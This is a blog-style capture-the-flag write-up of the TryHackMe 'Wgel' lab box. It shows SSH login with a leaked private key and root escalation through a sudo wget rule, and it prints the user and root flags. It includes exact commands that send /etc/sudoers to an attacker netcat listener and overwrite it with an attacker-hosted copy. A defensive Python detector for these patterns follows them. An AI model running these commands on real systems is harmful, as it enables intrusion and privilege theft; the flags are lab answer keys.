aldern00b

Wgel - THM

Have fun with this easy box.


OK, ssh and Apache. Apache brings us to an unconfigured website, so let's pop open gobuster. Gobuster finds a /sitemap folder and brings us to a template page. Let's poke around. Decided to poke with dirb. Looks like we have a .ssh folder in there with an RSA key.


We can't use that just yet though, because we need a username. Unfortunately I wasn't smart enough to look at the source code on the Apache page itself, so I got the idea from the writeup. Looks like Jessie is an important person.


Let's try that as a username. ...well damnit.


Fine. Let's try Hydra while we try and figure this out. While we did some research, it seemed it was easy enough to just change the permissions on the key file itself:

chmod 400 id_rsa

This then let us use ssh to log in as jessie:

ssh -i id_rsa jessie@10.10.104.137

Heading into her Documents folder we get the user flag.


User Flag: 057c67131c3d5e42dd5cd3075b198ff6

Okay, for the upgraded shell... I had to look this up. Check out this writeup here.

Here's my "walkthrough" of how we did this.


What we're going to be doing is modifying the /etc/sudoers file to give jessie all the power. In order to do this we need to get a copy of the original file, so we're going to stand up a netcat listener on our local machine to capture the contents of that file.


nc -lvnp 1234

Then we're going to use this command to send the contents of that file to our local machine as the body of an HTTP POST.


sudo /usr/bin/wget --post-file=/etc/sudoers 10.10.127.98:1234

This pushes the plain text to our PC; it will show up on our netcat screen. We're just going to copy this text and paste it into a new file called sudoers on our local box, commenting out her old permissions and giving her new permissions.

Next we start up a python web server so we can host this new file and use wget again to download it.


python3 -m http.server

Back under jessie's login we run the command below, making sure to point the output document at the existing sudoers file we read earlier, so it gets overwritten.


sudo /usr/bin/wget 10.10.127.98:8000/sudoers --output-document=/etc/sudoers

Once we do this we can validate by running sudo -l -l to see she now has ALL under the "Sudoers entry:" portion of that file. Once that's done we run sudo su to switch into root without a password and then pop our flag.
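The whole privesc above rests on one sudoers rule: jessie may run /usr/bin/wget as root, and wget can both read a file off disk (--post-file) and write a download over one (--output-document). As an added defender-side example, not part of the original writeup, here is a small Python checker that scans sudo's syslog entries for exactly that pattern; the log lines are constructed to mirror the commands on this box, and the hostname, timestamps and the "admin" user are made up.

```python
import re

# Constructed auth.log excerpt in sudo's syslog format, modelled on the
# commands used on this box. Not real captured logs.
SAMPLE_AUTH_LOG = """\
Jan 12 10:01:02 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget --post-file=/etc/sudoers 10.10.127.98:1234
Jan 12 10:04:10 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget 10.10.127.98:8000/sudoers --output-document=/etc/sudoers
Jan 12 10:05:00 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget http://mirror.example/patch.tar.gz
Jan 12 10:06:00 wgel sudo:   admin : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/apt-get update
"""

# sudo logs: "sudo: <user> : TTY=... ; PWD=... ; USER=<target> ; COMMAND=<cmd>"
SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")

# Files whose contents leaving the host, or being replaced, mean root compromise.
SENSITIVE_PREFIXES = ("/etc/sudoers", "/etc/shadow", "/etc/passwd", "/root/", "/etc/cron")


def flag_value(tokens, i):
    """Split a wget argument into (flag, value), handling --opt=value and --opt value."""
    if "=" in tokens[i]:
        return tuple(tokens[i].split("=", 1))
    return tokens[i], (tokens[i + 1] if i + 1 < len(tokens) else "")


def classify_wget(cmd):
    """Return the reasons a root wget invocation is dangerous (empty list if benign)."""
    reasons = []
    tokens = cmd.split()
    if not tokens or tokens[0].rsplit("/", 1)[-1] != "wget":
        return reasons
    for i in range(len(tokens)):
        name, value = flag_value(tokens, i)
        if name == "--post-file" and value.startswith(SENSITIVE_PREFIXES):
            reasons.append(f"reads {value} as root and POSTs it to a remote host")
        if name in ("--output-document", "-O") and value.startswith(SENSITIVE_PREFIXES):
            reasons.append(f"overwrites {value} as root with remote content")
    return reasons


def scan_auth_log(text):
    """Yield (invoking user, reason) for every sudo-to-root wget that touches a sensitive file."""
    findings = []
    for line in text.splitlines():
        m = SUDO_RE.search(line)
        if not m or m.group("target") != "root":
            continue
        for reason in classify_wget(m.group("cmd")):
            findings.append((m.group("user"), reason))
    return findings


if __name__ == "__main__":
    for user, reason in scan_auth_log(SAMPLE_AUTH_LOG):
        print(f"ALERT {user}: {reason}")
```

The benign wget download and the apt-get line produce no alert; the two commands that make this box fall do. The durable fix is removing wget (and any other file-transfer tool) from the NOPASSWD rule rather than alerting after the fact.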



Root flag is b1b968b37519ad1daa6408188649263d

I don't know if I would have marked this box "easy" ... or else... I'm still not ready for "easy" boxes on my own yet lol



